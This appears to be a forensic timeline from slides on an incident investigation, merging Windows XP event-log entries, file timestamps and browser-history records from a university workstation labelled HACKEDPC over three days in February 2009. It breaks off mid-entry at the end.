CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient was unable to find a domain controller to use as a time;source. NtpClient will try again in 60 minutes. -02/17/09 8:32:02 logged SysEvent.Evt EVENT ID: 29 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient is configured to acquire time from one or more;time sources, however none of the sources are currently accessible. ;No attempt to contact a source will be made for 59 minutes.;NtpClient has no source of accurate time. -02/17/09 9:29:54 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Adobe LM Service service entered the running state. -02/17/09 9:29:54 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-21-57765512-1263358170-1248344978-1385 COMPUTER: HACKEDPC DESCRIPTION: The Adobe LM Service service was successfully sent a start control. -02/17/09 9:32:05 logged SysEvent.Evt EVENT ID: 14 EVENT TYPE: WARNING EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient was unable to find a domain controller to use as a time;source. NtpClient will try again in 120 minutes. -02/17/09 9:32:05 logged SysEvent.Evt EVENT ID: 29 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient is configured to acquire time from one or more;time sources, however none of the sources are currently accessible. ;No attempt to contact a source will be made for 119 minutes.;NtpClient has no source of accurate time. -02/17/09 9:44:47 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Adobe LM Service service entered the stopped state. -02/17/09 10:09:22 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-21-57765512-1263358170-1248344978-1385 COMPUTER: HACKEDPC DESCRIPTION: The Adobe LM Service service was successfully sent a start control. -02/17/09 10:09:22 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Adobe LM Service service entered the running state. -02/17/09 10:55:21 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Adobe LM Service service entered the stopped state. -02/17/09 10:59:40 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Adobe LM Service service entered the running state. -02/17/09 10:59:40 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-21-57765512-1263358170-1248344978-1385 COMPUTER: HACKEDPC DESCRIPTION: The Adobe LM Service service was successfully sent a start control. -02/17/09 11:30:38 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Adobe LM Service service entered the stopped state. -02/17/09 11:32:10 logged SysEvent.Evt EVENT ID: 14 EVENT TYPE: WARNING EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient was unable to find a domain controller to use as a time;source. NtpClient will try again in 240 minutes. -02/17/09 11:32:10 logged SysEvent.Evt EVENT ID: 29 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient is configured to acquire time from one or more;time sources, however none of the sources are currently accessible. ;No attempt to contact a source will be made for 239 minutes.;NtpClient has no source of accurate time. -02/17/09 12:21:05 accessed _REGISTRY_MACHINE_SECURITYC:\\System Volume Information\_restore{46DE8921-1D39-44D2-A9E9-64119261F211}\RP657\snapshot\_REGISTRY_MACHINE_SECURITY File, Deleted, Overwritten, Archive, Compressed, Not Indexed02/17/09 12:21:05 created _REGISTRY_MACHINE_SECURITYC:\\System Volume Information\_restore{46DE8921-1D39-44D2-A9E9-64119261F211}\RP657\snapshot\_REGISTRY_MACHINE_SECURITY File, Deleted, Overwritten, Archive, Compressed, Not Indexed02/17/09 12:21:05 modified _REGISTRY_MACHINE_SECURITYC:\\System Volume Information\_restore{46DE8921-1D39-44D2-A9E9-64119261F211}\RP657\snapshot\_REGISTRY_MACHINE_SECURITY File, Deleted, Overwritten, Archive, Compressed, Not Indexed02/17/09 12:21:05 written _REGISTRY_MACHINE_SECURITYC:\\System Volume Information\_restore{46DE8921-1D39-44D2-A9E9-64119261F211}\RP657\snapshot\_REGISTRY_MACHINE_SECURITY File, Deleted, Overwritten, Archive, Compressed, Not Indexed02/17/09 12:22:27 logged SysEvent.Evt EVENT ID: 1 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The System Restore filter encountered the unexpected error '0xC000000D' while processing the file 'Bootcode.ini' on the volume 'Disk0'. It has stopped monitoring the volume. -02/17/09 15:33:38 logged SysEvent.Evt EVENT ID: 14 EVENT TYPE: WARNING EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient was unable to find a domain controller to use as a time;source. NtpClient will try again in 480 minutes. -02/17/09 15:33:38 logged SysEvent.Evt EVENT ID: 29 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient is configured to acquire time from one or more;time sources, however none of the sources are currently accessible. ;No attempt to contact a source will be made for 479 minutes.;NtpClient has no source of accurate time. -02/17/09 15:47:38 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-21-57765512-1263358170-1248344978-1385 COMPUTER: HACKEDPC DESCRIPTION: The Adobe LM Service service was successfully sent a start control. -02/17/09 15:47:38 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Adobe LM Service service entered the running state. -02/17/09 15:54:30 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Adobe LM Service service entered the stopped state. -02/17/09 17:00:51 logged SysEvent.Evt EVENT ID: 6006 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Event log service was stopped. -02/18/09 7:45:53 logged SysEvent.Evt EVENT ID: 9 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: Broadcom 440x 10/100 Integrated Controller: Network controller configured for 100Mb full-duplex link. -02/18/09 7:46:07 logged SysEvent.Evt EVENT ID: 6009 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: Microsoft (R) Windows (R) 5.01. 2600 Service Pack 3 Uniprocessor Free. -02/18/09 7:46:07 logged SysEvent.Evt EVENT ID: 6005 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Event log service was started. -02/18/09 7:46:36 logged SysEvent.Evt EVENT ID: 14 EVENT TYPE: WARNING EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient was unable to find a domain controller to use as a time;source. NtpClient will try again in 15 minutes. -02/18/09 7:46:36 logged SysEvent.Evt EVENT ID: 29 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient is configured to acquire time from one or more;time sources, however none of the sources are currently accessible. ;No attempt to contact a source will be made for 14 minutes.;NtpClient has no source of accurate time. -02/18/09 7:46:55 logged SysEvent.Evt EVENT ID: 14 EVENT TYPE: WARNING EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient was unable to find a domain controller to use as a time;source. NtpClient will try again in 15 minutes. -02/18/09 7:46:55 logged SysEvent.Evt EVENT ID: 29 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient is configured to acquire time from one or more;time sources, however none of the sources are currently accessible. ;No attempt to contact a source will be made for 14 minutes.;NtpClient has no source of accurate time. -02/18/09 7:47:13 logged SysEvent.Evt EVENT ID: 11162 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The system failed to register host (A) resource records (RRs) for;network adapterwith settings:; Adapter Name : {A45FF4F5-BE0B-4156-B8E8-7CFCB02CE985}; Host Name : hackedpc; Primary Domain Suffix : ubw.ohio-state.edu; DNS server list :; 164.107.xxx.29, 128.146.1.7, 128.146.48.7; Sent update to server : 164.1.1.1; IP Address(es) :; 164.107.xxx.177;The reason the system could not register these RRs was because the;update request it sent to the DNS server timed out. The most likely;cause of this is that the DNS server authoritative for the name it;was attempting to register or update is not running at this time.;You can manually retry DNS registration of the network adapter and;its settings by typing "ipconfig /registerdns" at the command prompt.;If problems still persist, contact your DNS server or network systems;administrator.-02/18/09 7:47:52 modified INDEX.BTR C:\\System Volume Information\_restore{46DE8921-1D39-44D2-A9E9-64119261F211}\RP658\snapshot\Repository\FS\INDEX.BTR File, Deleted, Overwritten, Archive, Compressed, Not Indexed02/18/09 7:47:52 written INDEX.BTR C:\\System Volume Information\_restore{46DE8921-1D39-44D2-A9E9-64119261F211}\RP658\snapshot\Repository\FS\INDEX.BTR File, Deleted, Overwritten, Archive, Compressed, Not Indexed02/18/09 7:48:54 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Fax service was successfully sent a stop control. -02/18/09 7:48:54 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Network Location Awareness (NLA) service was successfully sent a start control. -02/18/09 7:48:54 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Remote Access Connection Manager service was successfully sent a start control. -02/18/09 7:48:54 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Network Location Awareness (NLA) service entered the running state. -02/18/09 7:48:54 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Application Layer Gateway Service service was successfully sent a start control. -02/18/09 7:48:59 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Application Layer Gateway Service service entered the running state. -02/18/09 7:49:04 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Remote Access Connection Manager service entered the running state. -02/18/09 7:49:05 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Terminal Services service was successfully sent a start control. -02/18/09 7:49:05 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Terminal Services service entered the running state. -02/18/09 7:49:30 created WGATRAY.EXE-350D4455.pf C:\WINDOWS\Prefetch\WGATRAY.EXE-350D4455.pf02/18/09 7:49:38 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -02/18/09 7:49:38 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -02/18/09 7:49:46 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -02/18/09 7:49:52 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -02/18/09 7:49:52 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -02/18/09 7:50:00 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -02/18/09 7:50:03 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The SSDP Discovery Service service was successfully sent a start control. -02/18/09 7:50:03 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The SSDP Discovery Service service entered the running state. -02/18/09 7:52:18 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Background Intelligent Transfer Service service was successfully sent a start control. -02/18/09 7:52:19 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Background Intelligent Transfer Service service entered the running state. -02/18/09 7:52:59 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-21-57765512-1263358170-1248344978-1385 COMPUTER: HACKEDPC DESCRIPTION: The DSproct service was successfully sent a start control. -02/18/09 7:53:26 logged SysEvent.Evt EVENT ID: 1 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The System Restore filter encountered the unexpected error '0xC000000D' while processing the file 'Bootcode.ini' on the volume 'Disk0'. It has stopped monitoring the volume. -02/18/09 7:58:25 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-21-57765512-1263358170-1248344978-1385 COMPUTER: HACKEDPC DESCRIPTION: The Adobe LM Service service was successfully sent a start control. -02/18/09 7:58:25 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Adobe LM Service service entered the running state. -02/18/09 9:19:23 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Adobe LM Service service entered the stopped state. -02/18/09 12:27:07 accessed INDEX.BTR C:\\System Volume Information\_restore{46DE8921-1D39-44D2-A9E9-64119261F211}\RP658\snapshot\Repository\FS\INDEX.BTR File, Deleted, Overwritten, Archive, Compressed, Not Indexed02/18/09 12:27:07 created INDEX.BTR C:\\System Volume Information\_restore{46DE8921-1D39-44D2-A9E9-64119261F211}\RP658\snapshot\Repository\FS\INDEX.BTR File, Deleted, Overwritten, Archive, Compressed, Not Indexed
![Page 8: legend time activity name path/details](https://reader030.vdocument.in/reader030/viewer/2022013018/61d0cf0504243638ea4d819e/html5/thumbnails/8.jpg)
02/18/09 12:40:53 logged SysEvent.Evt EVENT ID: 1 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The System Restore filter encountered the unexpected error '0xC000000D' while processing the file 'Bootcode.ini' on the volume 'Disk0'. It has stopped monitoring the volume. -02/18/09 13:49:34 modified Misc.mbx C:\Program Files\Qualcomm\Eudora\Misc.mbx02/18/09 13:49:34 written Misc.mbx C:\Program Files\Qualcomm\Eudora\Misc.mbx02/18/09 13:49:44 accessed Misc.mbx C:\Program Files\Qualcomm\Eudora\Misc.mbx
02/18/09 16:58:35 logged SysEvent.Evt EVENT ID: 6006 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Event log service was stopped. -02/19/09 7:47:25 here’s the beginning of the day in question...starts with the system booting...
02/19/09 7:47:26 logged SysEvent.Evt EVENT ID: 9 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: Broadcom 440x 10/100 Integrated Controller: Network controller configured for 100Mb full-duplex link. -02/19/09 7:47:40 logged SysEvent.Evt EVENT ID: 6009 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: Microsoft (R) Windows (R) 5.01. 2600 Service Pack 3 Uniprocessor Free. -02/19/09 7:47:40 logged SysEvent.Evt EVENT ID: 6005 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Event log service was started. -02/19/09 7:48:44 logged SysEvent.Evt EVENT ID: 11162 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The system failed to register host (A) resource records (RRs) for;network adapterwith settings:; Adapter Name : {A45FF4F5-BE0B-4156-B8E8-7CFCB02CE985}; Host Name : hackedpc; Primary Domain Suffix : ubw.ohio-state.edu; DNS server list :; 164.107.xxx.29, 128.146.1.7, 128.146.48.7; Sent update to server : 164.1.1.1; IP Address(es) :; 164.107.xxx.177;The reason the system could not register these RRs was because the;update request it sent to the DNS server timed out. The most likely;cause of this is that the DNS server authoritative for the name it;was attempting to register or update is not running at this time.;You can manually retry DNS registration of the network adapter and;its settings by typing "ipconfig /registerdns" at the command prompt.;If problems still persist, contact your DNS server or network systems;administrator.-02/19/09 7:50:54 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Fax service was successfully sent a stop control. -02/19/09 7:50:54 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Network Location Awareness (NLA) service was successfully sent a start control. -02/19/09 7:50:54 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Network Location Awareness (NLA) service entered the running state. -02/19/09 7:50:54 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Remote Access Connection Manager service was successfully sent a start control. -02/19/09 7:50:54 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Application Layer Gateway Service service was successfully sent a start control. -02/19/09 7:50:54 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Application Layer Gateway Service service entered the running state. -02/19/09 7:50:54 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Terminal Services service was successfully sent a start control. -02/19/09 7:50:54 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Terminal Services service entered the running state. -02/19/09 7:50:54 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Remote Access Connection Manager service entered the running state. -02/19/09 7:51:15 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -02/19/09 7:51:15 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -02/19/09 7:51:22 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -02/19/09 7:51:29 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -02/19/09 7:51:29 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -02/19/09 7:51:36 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -02/19/09 7:51:41 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The SSDP Discovery Service service was successfully sent a start control. -02/19/09 7:51:42 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The SSDP Discovery Service service entered the running state. -02/19/09 7:52:51 accessed RUNDLL32.EXE-62AB2E98.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-62AB2E98.pf02/19/09 7:52:51 created RUNDLL32.EXE-62AB2E98.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-62AB2E98.pf02/19/09 7:52:51 written RUNDLL32.EXE-62AB2E98.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-62AB2E98.pf02/19/09 7:52:51 modified RUNDLL32.EXE-62AB2E98.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-62AB2E98.pf02/19/09 7:53:06 accessed index.dat :Host: My Computer History\Daily -02/19/09 7:54:01 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Background Intelligent Transfer Service service was successfully sent a start control. -02/19/09 7:54:02 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Background Intelligent Transfer Service service entered the running state. -02/19/09 7:54:15 accessed index.dat :Host: pub.weatherbug.com History\Daily -02/19/09 7:54:15 accessed index.dat http://pub.weatherbug.com/RealMedia/ads/adstream_sx.cgi/www.wbug.com/HM/5436@lb1?_RM_HTML_KEYWORDZ3_=43204&_RM_HTML_KEYWORDWO1_=24.80&_RM_HTML_KEYWORDL2_=Columbus&_RM_HTML_KEYWORDL3_=OH&_RM_HTML_KEYWORDHO1_=0.50&_RM_HTML_KEYWORDPC_=Z5264&A1=50500&A2=168&D1=2&D3=3&FC1=111&FC2=4&FC3=40&HO1=0.50&HO4=Mixed Trace.&L1=535&L2=Columbus&L3=OH&L4=23&N=506267455&Nav1=HM&Nav2=HM_Unknown&PC=Z5264&S2=&S3=0&SP1=&SP2=&SP5=-1&TW3=&UA1=506&WO1=24.80&WO3=0&WO4=68.00&Z3=43204&History\Daily -02/19/09 7:54:22 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-21-57765512-1263358170-1248344978-1385 COMPUTER: HACKEDPC DESCRIPTION: The DSproct service was successfully sent a start control. -02/19/09 7:54:24 created smith.99999@advertising[1].txt advertising.com/ Cookies -02/19/09 7:54:26 created smith.99999@advertising[1].txt advertising.com/ Cookies -02/19/09 7:54:32 accessed index.dat :Host: deskwx.weatherbug.com History\Daily -02/19/09 7:54:32 accessed index.dat http://deskwx.weatherbug.com/WeatherWindow/WeatherWindow.html?lvl=0&zip=43204&con1=111&sunr=1234959600&suns=1234998660&ut=1235048002&stat=KTZR&L1=535&ver=6.07&camera_id=&ccamzip=<a=<at=<az=&sed=0&lpt=1234961542&rnd=4827&&&&vcw=450&lvw=1210334133&lvd=1209989319&dosp=0&UA1=506&UA5=506&zcode=Z5264&showgutsads=1&screen_x=1152&screen_y=804&lvr=&lvu=&wpt=&A2=168&lvh=&wat=1234961185&A1=50500&dsr=506&dsu=506&dssp=-1&dspm=-1&pmls=1234184569&D3=3&UA3=-1&UA11=&UA15=&L4=23&UA16=&ui=0&n=506267455&alid=0&u=&LRR=&L3=OHHistory\Daily -02/19/09 7:54:38 accessed index.dat http://pub.weatherbug.com/RealMedia/ads/adstream_sx.cgi/www.wbug.com/HM/292@lb1?_RM_HTML_KEYWORDZ3_=43204&_RM_HTML_KEYWORDWO1_=24.80&_RM_HTML_KEYWORDL2_=Columbus&_RM_HTML_KEYWORDL3_=OH&_RM_HTML_KEYWORDHO1_=0.50&_RM_HTML_KEYWORDPC_=Z5264&A1=50500&A2=168&D1=2&D3=3&FC1=111&FC2=4&FC3=40&HO1=0.50&HO4=Mixed Trace.&L1=535&L2=Columbus&L3=OH&L4=23&N=506267455&Nav1=HM&Nav2=HM_Unknown&PC=Z5264&S2=&S3=0&SP1=&SP2=&SP5=-1&TW3=&UA1=506&WO1=24.80&WO3=0&WO4=68.00&Z3=43204&History\Daily -02/19/09 7:55:59 accessed RUNDLL32.EXE-4DEB4935.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-4DEB4935.pf02/19/09 7:55:59 created RUNDLL32.EXE-4DEB4935.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-4DEB4935.pf02/19/09 7:55:59 written RUNDLL32.EXE-4DEB4935.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-4DEB4935.pf02/19/09 7:55:59 modified RUNDLL32.EXE-4DEB4935.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-4DEB4935.pf02/19/09 7:56:06 accessed index.dat :Host: ubw.osu.edu History\Daily -02/19/09 7:56:19 created smith.99999@sloppykisscards[1].txtsloppykisscards.com/ Cookies -02/19/09 7:56:21 accessed index.dat :Host: www.sloppykisscards.com History\Daily -02/19/09 7:56:21 accessed index.dat http://www.sloppykisscards.com/partnerfetch.php?partnerid=vetinsite&partnerAffiliateId=36&cardId=npg28wkc3bHistory\Daily -02/19/09 7:57:07 logged SysEvent.Evt EVENT ID: 1 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The System Restore filter encountered the unexpected error '0xC000000D' while processing the file 'Bootcode.ini' on the volume 'Disk0'. It has stopped monitoring the volume. -02/19/09 8:00:07 accessed WINWORD.EXE-33AEA629.pf C:\WINDOWS\Prefetch\WINWORD.EXE-33AEA629.pf02/19/09 8:00:07 written WINWORD.EXE-33AEA629.pf C:\WINDOWS\Prefetch\WINWORD.EXE-33AEA629.pf02/19/09 8:00:07 modified WINWORD.EXE-33AEA629.pf C:\WINDOWS\Prefetch\WINWORD.EXE-33AEA629.pf02/19/09 8:02:17 accessed RUNDLL32.EXE-4FF9832D.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-4FF9832D.pf02/19/09 8:02:17 written RUNDLL32.EXE-4FF9832D.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-4FF9832D.pf02/19/09 8:02:17 modified RUNDLL32.EXE-4FF9832D.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-4FF9832D.pf02/19/09 8:02:33 accessed PSCT8500.EXE-0492DFC4.pf C:\WINDOWS\Prefetch\PSCT8500.EXE-0492DFC4.pf02/19/09 8:02:33 written PSCT8500.EXE-0492DFC4.pf C:\WINDOWS\Prefetch\PSCT8500.EXE-0492DFC4.pf02/19/09 8:02:33 modified PSCT8500.EXE-0492DFC4.pf C:\WINDOWS\Prefetch\PSCT8500.EXE-0492DFC4.pf02/19/09 8:15:31 accessed RUNDLL32.EXE-6BA7CEE7.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-6BA7CEE7.pf02/19/09 8:15:31 created RUNDLL32.EXE-6BA7CEE7.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-6BA7CEE7.pf02/19/09 8:15:31 written RUNDLL32.EXE-6BA7CEE7.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-6BA7CEE7.pf02/19/09 8:15:31 modified RUNDLL32.EXE-6BA7CEE7.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-6BA7CEE7.pf02/19/09 8:15:51 accessed index.dat :Host: www.cuofohio.org History\Daily -02/19/09 8:17:26 accessed Credit Union of Ohio - Your Financial Resource Partner.urlhttp://www.cuofohio.org/ Bookmarks -02/19/09 8:17:26 accessed index.dat http://www.cuofohio.org History\Daily -02/19/09 8:17:44 accessed index.dat :Host: buckeyelink.osu.edu History\Daily -02/19/09 8:17:44 accessed index.dat http://buckeyelink.osu.edu History\Daily -02/19/09 8:17:53 accessed index.dat :Host: carmen.osu.edu History\Daily -02/19/09 8:17:53 accessed index.dat https://carmen.osu.edu History\Daily -02/19/09 8:20:37 accessed index.dat https://carmen.osu.edu/goodbye.asp History\Daily -02/19/09 8:24:13 accessed RUNDLL32.EXE-71655565.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-71655565.pf02/19/09 8:24:13 created 